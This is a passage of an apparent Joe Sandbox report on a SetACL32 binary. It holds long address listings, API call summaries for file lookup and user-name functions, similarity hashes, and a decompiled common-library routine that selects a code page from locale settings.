              0x012c4e32
              0x012c4e34
              0x012c4e3a
              0x012c4e50
              0x012c4e50
              0x012c4e52
              0x012c4e57
              0x00000000
              0x012c4e3c
              0x012c4e3c
              0x012c4e3f
              0x012c4e47
              0x012c4e4a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4e4a
              0x012c4e3a
              0x012c4dee
              0x012c4dee
              0x012c4df1
              0x012c4df8
              0x012c4dfa
              0x012c4e00
              0x012c4e16
              0x012c4e16
              0x012c4e18
              0x012c4e1d
              0x00000000
              0x012c4e02
              0x012c4e02
              0x012c4e05
              0x012c4e0d
              0x012c4e10
              0x012c5137
              0x012c5137
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4e10
              0x012c4e00
              0x012c4dec
              0x012c4d4c
              0x012c4d39
              0x012c4d20
              0x012c4d20
              0x012c4d23
              0x012c4e97
              0x012c4e97
              0x012c4e9b
              0x00000000
              0x012c4ea1
              0x012c4eae
              0x012c4eb0
              0x012c4eb9
              0x012c4ebc
              0x012c4ebe
              0x012c4ec1
              0x012c513c
              0x012c513c
              0x00000000
              0x012c4ec7
              0x012c4ec7
              0x012c4ecf
              0x012c4ee5
              0x012c4eea
              0x012c4ef4
              0x012c4ef8
              0x012c4eff
              0x012c4f02
              0x012c4f06
              0x012c4f0b
              0x012c4f10
              0x012c4f17
              0x012c4f1e
              0x012c4f21
              0x012c4f25
              0x012c4f33
              0x012c4f38
              0x012c4f43
              0x012c4f4f
              0x012c4f56
              0x012c4f5d
              0x012c4f61
              0x012c4f66
              0x012c4f6e
              0x012c4f72
              0x012c4f76
              0x012c4f79
              0x012c4f7e
              0x012c4f81
              0x012c4f84
              0x012c4fb8
              0x012c4fb8
              0x012c4fbb
              0x012c4fbe
              0x012c4ff2
              0x012c4ff2
              0x012c4ff5
              0x012c4ff8
              0x012c502c
              0x012c502c
              0x012c502f
              0x012c5032
              0x012c5066
              0x012c5066
              0x012c506b
              0x012c5072
              0x012c5079
              0x012c507d
              0x012c5080
              0x00000000
              0x012c5082
              0x012c5082
              0x012c5088
              0x012c508f
              0x012c5091
              0x012c5097
              0x012c50ad
              0x012c50ad
              0x012c50af
              0x012c50b4
              0x00000000
              0x012c5099
              0x012c5099
              0x012c509c
              0x012c50a4
              0x012c50a7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c50a7
              0x012c5097
              0x012c5034
              0x012c5034
              0x012c5037
              0x012c503e
              0x012c5040
              0x012c5046
              0x012c505c
              0x012c505c
              0x012c505e
              0x012c5063
              0x00000000
              0x012c5048
              0x012c5048
              0x012c504b
              0x012c5053
              0x012c5056
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5056
              0x012c5046
              0x012c4ffa
              0x012c4ffa
              0x012c4ffd
              0x012c5004
              0x012c5006
              0x012c500c
              0x012c5022
              0x012c5022
              0x012c5024
              0x012c5029
              0x00000000
              0x012c500e
              0x012c500e
              0x012c5011
              0x012c5019
              0x012c501c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c501c
              0x012c500c
              0x012c4fc0
              0x012c4fc0
              0x012c4fc3
              0x012c4fca
              0x012c4fcc
              0x012c4fd2
              0x012c4fe8
              0x012c4fe8
              0x012c4fea
              0x012c4fef
              0x00000000
              0x012c4fd4
              0x012c4fd4
              0x012c4fd7
              0x012c4fdf
              0x012c4fe2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4fe2
              0x012c4fd2
              0x012c4f86
              0x012c4f86
              0x012c4f89
              0x012c4f90
              0x012c4f92
              0x012c4f98
              0x012c4fae
              0x012c4fae
              0x012c4fb0
              0x012c4fb5
              0x00000000
              0x012c4f9a
              0x012c4f9a
              0x012c4f9d
              0x012c4fa5
              0x012c4fa8
              0x012c5141
              0x012c5141
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c4fa8
              0x012c4f98
              0x012c4f84
              0x012c4ec1
              0x00000000
              0x00000000
              0x00000000
              0x012c4d23
              0x012c4d1e
              0x012c4cc1
              0x012c4cc1
              0x012c50dc
              0x012c50dc
              0x012c50df
              0x012c50e2
              0x012c5112
              0x012c5117
              0x012c511f
              0x012c5120
              0x012c5124
              0x012c5131
              0x012c50e4
              0x012c50e4
              0x012c50e7
              0x012c50ee
              0x012c50f0
              0x012c50f6
              0x012c5108
              0x012c5108
              0x012c510a
              0x00000000
              0x012c50f8
              0x012c50f8
              0x012c50fb
              0x012c5103
              0x012c5106
              0x012c5146
              0x012c5146
              0x012c514b
              0x012c514c
              0x012c514d
              0x012c514e
              0x012c514f
              0x012c5150
              0x012c5151
              0x012c5159
              0x012c515c
              0x012c5160
              0x012c5164
              0x012c5166
              0x012c5168
              0x012c5173
              0x012c5174
              0x012c5175
              0x012c517b
              0x012c5182
              0x012c518b
              0x012c5191
              0x012c5197
              0x012c51a0
              0x012c51a7
              0x012c51a9
              0x012c51ae
              0x012c51b6
              0x012c51bb
              0x012c51c1
              0x012c51c3
              0x012c5581
              0x012c5581
              0x012c5588
              0x00000000
              0x012c558e
              0x012c558e
              0x012c5598
              0x012c559b
              0x00000000
              0x012c55a1
              0x012c55a1
              0x012c55a9
              0x012c55bf
              0x012c55c4
              0x012c55ce
              0x012c55d2
              0x012c55d9
              0x012c55dc
              0x012c55e0
              0x012c55e5
              0x012c55ea
              0x012c55f1
              0x012c55f8
              0x012c55fb
              0x012c5601
              0x012c5606
              0x012c5611
              0x012c5618
              0x012c561c
              0x012c5621
              0x012c5629
              0x012c562d
              0x012c5631
              0x012c5634
              0x012c5639
              0x012c563c
              0x012c563f
              0x012c5673
              0x012c5673
              0x012c5676
              0x012c5679
              0x012c56ad
              0x012c56ad
              0x012c56b0
              0x012c56b3
              0x00000000
              0x012c56b5
              0x012c56b5
              0x012c56b8
              0x012c56bf
              0x012c56c1
              0x012c56c7
              0x012c56dd
              0x012c56dd
              0x012c56df
              0x00000000
              0x012c56c9
              0x012c56c9
              0x012c56cc
              0x012c56d4
              0x012c56d7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c56d7
              0x012c56c7
              0x012c567b
              0x012c567b
              0x012c567e
              0x012c5685
              0x012c5687
              0x012c568d
              0x012c56a3
              0x012c56a3
              0x012c56a5
              0x012c56aa
              0x00000000
              0x012c568f
              0x012c568f
              0x012c5692
              0x012c569a
              0x012c569d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c569d
              0x012c568d
              0x012c5641
              0x012c5641
              0x012c5644
              0x012c564b
              0x012c564d
              0x012c5653
              0x012c5669
              0x012c5669
              0x012c566b
              0x012c5670
              0x00000000
              0x012c5655
              0x012c5655
              0x012c5658
              0x012c5660
              0x012c5663
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5663
              0x012c5653
              0x012c563f
              0x012c559b
              0x012c51c9
              0x012c51c9
              0x012c51cf
              0x012c51d1
              0x012c51d3
              0x012c51d5
              0x00000000
              0x012c51db
              0x012c51db
              0x012c51e1
              0x012c5411
              0x012c5418
              0x00000000
              0x012c541e
              0x012c541e
              0x012c5428
              0x012c542b
              0x00000000
              0x012c5431
              0x012c5431
              0x012c5439
              0x012c544f
              0x012c5454
              0x012c545e
              0x012c5462
              0x012c5469
              0x012c546c
              0x012c5470
              0x012c5475
              0x012c547a
              0x012c5481
              0x012c5488
              0x012c548b
              0x012c5491
              0x012c5496
              0x012c54a1
              0x012c54a8
              0x012c54ac
              0x012c54b1
              0x012c54b9
              0x012c54bd
              0x012c54c1
              0x012c54c4
              0x012c54c9
              0x012c54cc
              0x012c54cf
              0x012c5503
              0x012c5503
              0x012c5506
              0x012c5509
              0x012c553d
              0x012c553d
              0x012c5540
              0x012c5542
              0x012c5545
              0x00000000
              0x012c554b
              0x012c554b
              0x012c554e
              0x012c5555
              0x012c5557
              0x012c555d
              0x012c5573
              0x012c5573
              0x012c5575
              0x012c557a
              0x012c56e4
              0x012c56e4
              0x00000000
              0x012c555f
              0x012c555f
              0x012c5562
              0x012c556a
              0x012c556d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c556d
              0x012c555d
              0x012c550b
              0x012c550b
              0x012c550e
              0x012c5515
              0x012c5517
              0x012c551d
              0x012c5533
              0x012c5533
              0x012c5535
              0x012c553a
              0x00000000
              0x012c551f
              0x012c551f
              0x012c5522
              0x012c552a
              0x012c552d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c552d
              0x012c551d
              0x012c54d1
              0x012c54d1
              0x012c54d4
              0x012c54db
              0x012c54dd
              0x012c54e3
              0x012c54f9
              0x012c54f9
              0x012c54fb
              0x012c5500
              0x00000000
              0x012c54e5
              0x012c54e5
              0x012c54e8
              0x012c54f0
              0x012c54f3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c54f3
              0x012c54e3
              0x012c54cf
              0x012c542b
              0x012c51e7
              0x012c51e7
              0x012c51ee
              0x012c540a
              0x012c540a
              0x012c56e7
              0x012c56e7
              0x012c56ec
              0x012c56f2
              0x012c56f5
              0x012c56f8
              0x012c5728
              0x012c572d
              0x012c5735
              0x012c5736
              0x012c573a
              0x012c5747
              0x012c56fa
              0x012c56fa
              0x012c56fd
              0x012c5704
              0x012c5706
              0x012c570c
              0x012c571e
              0x012c571e
              0x012c5720
              0x00000000
              0x012c570e
              0x012c570e
              0x012c5711
              0x012c5719
              0x012c571c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c571c
              0x012c570c
              0x012c51f4
              0x012c5201
              0x012c5203
              0x012c520c
              0x012c520f
              0x012c5211
              0x012c5214
              0x012c5748
              0x00000000
              0x012c521a
              0x012c521a
              0x012c5222
              0x012c5238
              0x012c523d
              0x012c5247
              0x012c524b
              0x012c5252
              0x012c5255
              0x012c5259
              0x012c525e
              0x012c5263
              0x012c526a
              0x012c5271
              0x012c5274
              0x012c5278
              0x012c5286
              0x012c528b
              0x012c5296
              0x012c52a2
              0x012c52a9
              0x012c52b0
              0x012c52b4
              0x012c52b9
              0x012c52c1
              0x012c52c5
              0x012c52c9
              0x012c52cc
              0x012c52d1
              0x012c52d4
              0x012c52d7
              0x012c530b
              0x012c530b
              0x012c530e
              0x012c5311
              0x012c5345
              0x012c5345
              0x012c5348
              0x012c534b
              0x012c537f
              0x012c537f
              0x012c5382
              0x012c5385
              0x012c53b9
              0x012c53b9
              0x012c53be
              0x012c53c5
              0x012c53cc
              0x012c53d0
              0x012c53d3
              0x00000000
              0x012c53d5
              0x012c53d5
              0x012c53db
              0x012c53e2
              0x012c53e4
              0x012c53ea
              0x012c5400
              0x012c5400
              0x012c5402
              0x012c5407
              0x00000000
              0x012c53ec
              0x012c53ec
              0x012c53ef
              0x012c53f7
              0x012c53fa
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c53fa
              0x012c53ea
              0x012c5387
              0x012c5387
              0x012c538a
              0x012c5391
              0x012c5393
              0x012c5399
              0x012c53af
              0x012c53af
              0x012c53b1
              0x012c53b6
              0x00000000
              0x012c539b
              0x012c539b
              0x012c539e
              0x012c53a6
              0x012c53a9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c53a9
              0x012c5399
              0x012c534d
              0x012c534d
              0x012c5350
              0x012c5357
              0x012c5359
              0x012c535f
              0x012c5375
              0x012c5375
              0x012c5377
              0x012c537c
              0x00000000
              0x012c5361
              0x012c5361
              0x012c5364
              0x012c536c
              0x012c536f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c536f
              0x012c535f
              0x012c5313
              0x012c5313
              0x012c5316
              0x012c531d
              0x012c531f
              0x012c5325
              0x012c533b
              0x012c533b
              0x012c533d
              0x012c5342
              0x00000000
              0x012c5327
              0x012c5327
              0x012c532a
              0x012c5332
              0x012c5335
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5335
              0x012c5325
              0x012c52d9
              0x012c52d9
              0x012c52dc
              0x012c52e3
              0x012c52e5
              0x012c52eb
              0x012c5301
              0x012c5301
              0x012c5303
              0x012c5308
              0x00000000
              0x012c52ed
              0x012c52ed
              0x012c52f0
              0x012c52f8
              0x012c52fb
              0x012c574d
              0x012c574d
              0x012c5752
              0x012c5752
              0x012c5757
              0x012c5757
              0x012c575c
              0x012c575c
              0x012c5761
              0x012c5761
              0x012c5766
              0x012c5766
              0x012c576b
              0x012c576c
              0x012c576d
              0x012c576e
              0x012c576f
              0x012c5770
              0x012c5771
              0x012c5773
              0x012c5775
              0x012c5780
              0x012c5781
              0x012c5782
              0x012c5783
              0x012c5784
              0x012c5785
              0x012c578c
              0x012c578d
              0x012c5790
              0x012c5796
              0x012c5798
              0x012c579b
              0x012c579e
              0x012c57a8
              0x012c57ac
              0x012c57af
              0x012c57b3
              0x012c57b6
              0x012c57b8
              0x012c57e3
              0x012c57e3
              0x012c57e3
              0x012c57ba
              0x012c57ba
              0x012c57ba
              0x012c57bf
              0x012c57c1
              0x012c57c4
              0x012c57c9
              0x012c57cc
              0x012c57dd
              0x012c57df
              0x012c57d0
              0x012c57d0
              0x012c57d0
              0x012c57d2
              0x00000000
              0x00000000
              0x012c57d4
              0x012c57d7
              0x012c57db
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c57db
              0x00000000
              0x012c57d0
              0x012c57cc
              0x012c57e6
              0x012c57e6
              0x012c57e6
              0x012c57e9
              0x012c57f1
              0x012c57f8
              0x012c57ff
              0x012c5802
              0x012c5804
              0x012c586f
              0x00000000
              0x012c5806
              0x012c5806
              0x012c580b
              0x012c580e
              0x012c5811
              0x012c5816
              0x012c5820
              0x012c5825
              0x012c5828
              0x012c582b
              0x012c585b
              0x012c5860
              0x012c586e
              0x012c582d
              0x012c582d
              0x012c5830
              0x012c5837
              0x012c5839
              0x012c583f
              0x012c5851
              0x012c5851
              0x012c5853
              0x00000000
              0x012c5841
              0x012c5841
              0x012c5844
              0x012c584c
              0x012c584f
              0x012c5874
              0x012c5874
              0x012c5879
              0x012c587a
              0x012c587b
              0x012c587c
              0x012c587d
              0x012c587e
              0x012c587f
              0x012c5880
              0x012c5881
              0x012c5883
              0x012c5885
              0x012c5890
              0x012c5891
              0x012c5892
              0x012c5893
              0x012c5894
              0x012c589b
              0x012c589c
              0x012c589f
              0x012c58a5
              0x012c58a7
              0x012c58aa
              0x012c58ad
              0x012c58b7
              0x012c58bb
              0x012c58be
              0x012c58c2
              0x012c58c4
              0x012c58f3
              0x012c58f3
              0x012c58f3
              0x012c58c6
              0x012c58c6
              0x012c58c9
              0x012c58c9
              0x012c58cc
              0x012c58ce
              0x012c58d1
              0x012c58d6
              0x012c58d9
              0x012c58ed
              0x012c58ef
              0x012c58e0
              0x012c58e0
              0x012c58e0
              0x012c58e2
              0x00000000
              0x00000000
              0x012c58e4
              0x012c58e7
              0x012c58eb
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c58eb
              0x00000000
              0x012c58e0
              0x012c58d9
              0x012c58f6
              0x012c58f6
              0x012c58fd
              0x012c5901
              0x012c5903
              0x012c5935
              0x012c5935
              0x012c5935
              0x012c5905
              0x012c5905
              0x012c5905
              0x012c590d
              0x012c5910
              0x012c5913
              0x012c5915
              0x012c5918
              0x012c591d
              0x012c5920
              0x012c592f
              0x012c5931
              0x012c5922
              0x012c5922
              0x012c5922
              0x012c5924
              0x00000000
              0x00000000
              0x012c5926
              0x012c5929
              0x012c592d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c592d
              0x00000000
              0x012c5922
              0x012c5920
              0x012c5938
              0x012c5938
              0x012c593b
              0x012c59bc
              0x012c59bc
              0x012c59c0
              0x012c59c6
              0x012c59cd
              0x012c59d4
              0x012c59d7
              0x012c59dc
              0x00000000
              0x012c593d
              0x012c593d
              0x012c593f
              0x00000000
              0x012c5941
              0x012c5943
              0x012c5949
              0x012c594b
              0x012c5952
              0x012c5959
              0x012c595c
              0x012c595f
              0x012c5967
              0x012c596e
              0x012c5973
              0x012c5976
              0x012c5979
              0x012c59e1
              0x012c59e6
              0x012c59f3
              0x012c597b
              0x012c597b
              0x012c597e
              0x012c5985
              0x012c5987
              0x012c598d
              0x012c599f
              0x012c599f
              0x012c59a1
              0x012c59ae
              0x012c59bb
              0x012c598f
              0x012c598f
              0x012c5992
              0x012c599a
              0x012c599d
              0x012c59f4
              0x012c59f9
              0x012c59fa
              0x012c59fb
              0x012c59fc
              0x012c59fd
              0x012c59fe
              0x012c59ff
              0x012c5a00
              0x012c5a01
              0x012c5a03
              0x012c5a05
              0x012c5a10
              0x012c5a11
              0x012c5a12
              0x012c5a13
              0x012c5a14
              0x012c5a15
              0x012c5a1c
              0x012c5a1d
              0x012c5a20
              0x012c5a26
              0x012c5a28
              0x012c5a2b
              0x012c5a2e
              0x012c5a38
              0x012c5a3c
              0x012c5a3f
              0x012c5a43
              0x012c5a45
              0x012c5a73
              0x012c5a73
              0x012c5a73
              0x012c5a47
              0x012c5a47
              0x012c5a4a
              0x012c5a4a
              0x012c5a4d
              0x012c5a4f
              0x012c5a52
              0x012c5a57
              0x012c5a5a
              0x012c5a6d
              0x012c5a6f
              0x012c5a60
              0x012c5a60
              0x012c5a60
              0x012c5a62
              0x00000000
              0x00000000
              0x012c5a64
              0x012c5a67
              0x012c5a6b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5a6b
              0x00000000
              0x012c5a60
              0x012c5a5a
              0x012c5a76
              0x012c5a76
              0x012c5a7d
              0x012c5a81
              0x012c5a83
              0x012c5ab3
              0x012c5ab3
              0x012c5ab3
              0x012c5a85
              0x012c5a85
              0x012c5a85
              0x012c5a88
              0x012c5a8b
              0x012c5a8d
              0x012c5a90
              0x012c5a95
              0x012c5a98
              0x012c5aad
              0x012c5aaf
              0x012c5a9a
              0x012c5a9a
              0x012c5aa0
              0x012c5aa0
              0x012c5aa2
              0x00000000
              0x00000000
              0x012c5aa4
              0x012c5aa7
              0x012c5aab
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5aab
              0x00000000
              0x012c5aa0
              0x012c5a98
              0x012c5ab6
              0x012c5ab6
              0x012c5ab9
              0x012c5b57
              0x012c5b59
              0x012c5b60
              0x012c5b69
              0x012c5b75
              0x012c5b78
              0x012c5b7d
              0x012c5b80
              0x012c5b83
              0x00000000
              0x012c5b85
              0x012c5b85
              0x012c5b88
              0x012c5b8f
              0x012c5b91
              0x012c5b97
              0x00000000
              0x012c5b99
              0x012c5b99
              0x012c5b9c
              0x012c5ba4
              0x012c5ba7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5ba7
              0x012c5b97
              0x012c5abf
              0x012c5abf
              0x012c5ac1
              0x00000000
              0x012c5ac7
              0x012c5ac7
              0x012c5ac8
              0x012c5ad0
              0x012c5ad7
              0x012c5ade
              0x012c5ae1
              0x012c5ae3
              0x012c5bae
              0x012c5bae
              0x012c5bb3
              0x012c5bb4
              0x012c5bb5
              0x012c5bb6
              0x012c5bb7
              0x012c5bb8
              0x012c5bb9
              0x012c5bba
              0x012c5bbb
              0x012c5bbc
              0x012c5bbd
              0x012c5bbe
              0x012c5bbf
              0x012c5bc0
              0x012c5bc1
              0x012c5bc3
              0x012c5bd6
              0x012c5be1
              0x012c5be7
              0x012c5be9
              0x012c5bec
              0x012c5bef
              0x012c5bf2
              0x012c5bfe
              0x012c5c01
              0x012c5c09
              0x012c5c10
              0x012c5c15
              0x012c5c18
              0x012c5c1d
              0x012c5c23
              0x012c5c26
              0x012c5c2a
              0x012c5c2e
              0x012c5c30
              0x012c5ce5
              0x012c5ce7
              0x012c5cee
              0x012c5cf7
              0x012c5d03
              0x012c5d06
              0x012c5d0b
              0x012c5d0e
              0x012c5d11
              0x00000000
              0x012c5d13
              0x012c5d13
              0x012c5d16
              0x012c5d1d
              0x012c5d1f
              0x012c5d25
              0x00000000
              0x012c5d27
              0x012c5d27
              0x012c5d2a
              0x012c5d32
              0x012c5d35
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5d35
              0x012c5d25
              0x012c5c36
              0x012c5c36
              0x012c5c39
              0x012c5c3c
              0x012c5c3e
              0x012c5c41
              0x012c5c46
              0x012c5c49
              0x012c5c61
              0x012c5c63
              0x012c5c65
              0x012c5c68
              0x00000000
              0x012c5c6a
              0x012c5c6c
              0x012c5c72
              0x012c5c74
              0x012c5c7b
              0x012c5c82
              0x012c5c85
              0x012c5c88
              0x012c5c90
              0x012c5c97
              0x012c5c9c
              0x012c5c9f
              0x012c5ca2
              0x012c5cd2
              0x012c5cd7
              0x012c5ce4
              0x012c5ca4
              0x012c5ca4
              0x012c5ca7
              0x012c5cae
              0x012c5cb0
              0x012c5cb6
              0x012c5cc8
              0x012c5cc8
              0x012c5cca
              0x00000000
              0x012c5cb8
              0x012c5cb8
              0x012c5cbb
              0x012c5cc3
              0x012c5cc6
              0x012c5d37
              0x012c5d37
              0x012c5d3c
              0x012c5d3d
              0x012c5d3e
              0x012c5d3f
              0x012c5d4a
              0x012c5d58
              0x012c5d64
              0x012c5d6c
              0x012c5d6e
              0x012c5d8a
              0x012c5d70
              0x012c5d70
              0x012c5d7c
              0x012c5d83
              0x012c5d83
              0x00000000
              0x00000000
              0x00000000
              0x012c5cc6
              0x012c5cb6
              0x012c5ca2
              0x012c5c50
              0x012c5c50
              0x012c5c50
              0x012c5c52
              0x00000000
              0x00000000
              0x012c5c58
              0x012c5c5b
              0x012c5c5f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5c5f
              0x00000000
              0x012c5c50
              0x012c5c49
              0x012c5ae9
              0x012c5ae9
              0x012c5aee
              0x012c5af6
              0x012c5af9
              0x012c5afe
              0x012c5b08
              0x012c5b0d
              0x012c5b10
              0x012c5b13
              0x012c5b43
              0x012c5b48
              0x012c5b56
              0x012c5b15
              0x012c5b15
              0x012c5b18
              0x012c5b1f
              0x012c5b21
              0x012c5b27
              0x012c5b39
              0x012c5b39
              0x012c5b3b
              0x00000000
              0x012c5b29
              0x012c5b29
              0x012c5b2c
              0x012c5b34
              0x012c5b37
              0x012c5ba9
              0x012c5ba9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5b37
              0x012c5b27
              0x012c5b13
              0x012c5ae3
              0x012c5ac1
              0x00000000
              0x00000000
              0x00000000
              0x012c599d
              0x012c598d
              0x012c5979
              0x012c593f
              0x00000000
              0x00000000
              0x00000000
              0x012c584f
              0x012c583f
              0x012c582b
              0x00000000
              0x00000000
              0x00000000
              0x012c52fb
              0x012c52eb
              0x012c52d7
              0x012c5214
              0x012c51ee
              0x012c51e1
              0x012c51d5
              0x00000000
              0x00000000
              0x00000000
              0x012c5106
              0x012c50f6
              0x012c50e2
              0x00000000
              0x00000000
              0x00000000
              0x012c4aba
              0x012c4aaa
              0x012c4a96
              0x012c49d3
              0x012c49ad
              0x012c49a3
              0x012c498d
              0x012c4980
              0x00000000

              APIs
              • FindFirstFileW.KERNEL32(?,?,EDD8D3B4,?,00000000), ref: 012C4975
              • GetLastError.KERNEL32(?,EDD8D3B4,?,00000000), ref: 012C4982
                • Part of subcall function 012A88E0: GetLastError.KERNEL32(EDD8D3B4,00000000,00000000), ref: 012A8960
                • Part of subcall function 012A98F0: EnterCriticalSection.KERNEL32(0130B6D4,EDD8D3B4,?), ref: 012A9982
                • Part of subcall function 012A98F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 012A99CB
                • Part of subcall function 012A98F0: GetCurrentThreadId.KERNEL32 ref: 012A99EE
                • Part of subcall function 012A98F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 012A9A2A
                • Part of subcall function 012A98F0: GetLastError.KERNEL32 ref: 012A9A34
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$FileTime$CriticalCurrentEnterFindFirstNameSectionSystemThreadUser
              • String ID: %#x$' failed with: $' returned: $> of <$?\UNC\$@Mhv$FindFirstFile for path '$FindFirstFileAPIWrapper$GetFileAttributes of '$GetFileAttributesAPIWrapper$Retrieved attributes <$\\?$\\?\$\\?\UNC\
              • API String ID: 2019599463-117694520
              • Opcode ID: 9b1099cbb65236d01d5f709875a90d1bd0ecab52dc5a9a101924ab9ae1ee735f
              • Instruction ID: ab18f3413cf62c49a52f2b67f4f53ffc11174cbf5bc001799f8898f7d7c5e8d0
              • Opcode Fuzzy Hash: 9b1099cbb65236d01d5f709875a90d1bd0ecab52dc5a9a101924ab9ae1ee735f
              • Instruction Fuzzy Hash: 89914931A201999FDB18EF68CC94BEEBB75EF95B14F14831CE70497294DB749A80CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D9EEC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 94%
              			E012D9EEC(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E012D4B69(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















              0x012d9ef1
              0x012d9ef2
              0x012d9ef9
              0x012d9f9d
              0x012d9fb6
              0x012d9fbc
              0x012d9fc1
              0x012d9fc3
              0x012d9fc3
              0x012d9fc9
              0x012d9fcc
              0x012d9fcc
              0x012d9fb8
              0x012d9fb8
              0x00000000
              0x012d9fb8
              0x012d9eff
              0x012d9f04
              0x00000000
              0x00000000
              0x012d9f0a
              0x012d9f0f
              0x012d9f11
              0x012d9f11
              0x012d9f17
              0x00000000
              0x00000000
              0x012d9f1c
              0x012d9f33
              0x012d9f33
              0x012d9f3c
              0x012d9f3e
              0x00000000
              0x00000000
              0x012d9f40
              0x012d9f45
              0x012d9f47
              0x012d9f47
              0x012d9f4d
              0x00000000
              0x00000000
              0x012d9f52
              0x012d9f70
              0x012d9f72
              0x012d9f95
              0x00000000
              0x012d9f9a
              0x012d9f8d
              0x00000000
              0x00000000
              0x012d9f8f
              0x00000000
              0x012d9f8f
              0x012d9f54
              0x012d9f5c
              0x00000000
              0x00000000
              0x012d9f5e
              0x012d9f61
              0x012d9f67
              0x00000000
              0x00000000
              0x00000000
              0x012d9f69
              0x012d9f6b
              0x012d9f6d
              0x00000000
              0x012d9f6d
              0x012d9f1e
              0x012d9f26
              0x00000000
              0x00000000
              0x012d9f28
              0x012d9f2b
              0x012d9f31
              0x00000000
              0x00000000
              0x00000000
              0x012d9f31
              0x012d9f37
              0x012d9f39
              0x00000000

              APIs
              • GetLocaleInfoW.KERNEL32(?,2000000B,012DA20A,00000002,00000000,?,?,?,012DA20A,?,00000000), ref: 012D9F85
              • GetLocaleInfoW.KERNEL32(?,20001004,012DA20A,00000002,00000000,?,?,?,012DA20A,?,00000000), ref: 012D9FAE
              • GetACP.KERNEL32(?,?,012DA20A,?,00000000), ref: 012D9FC3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
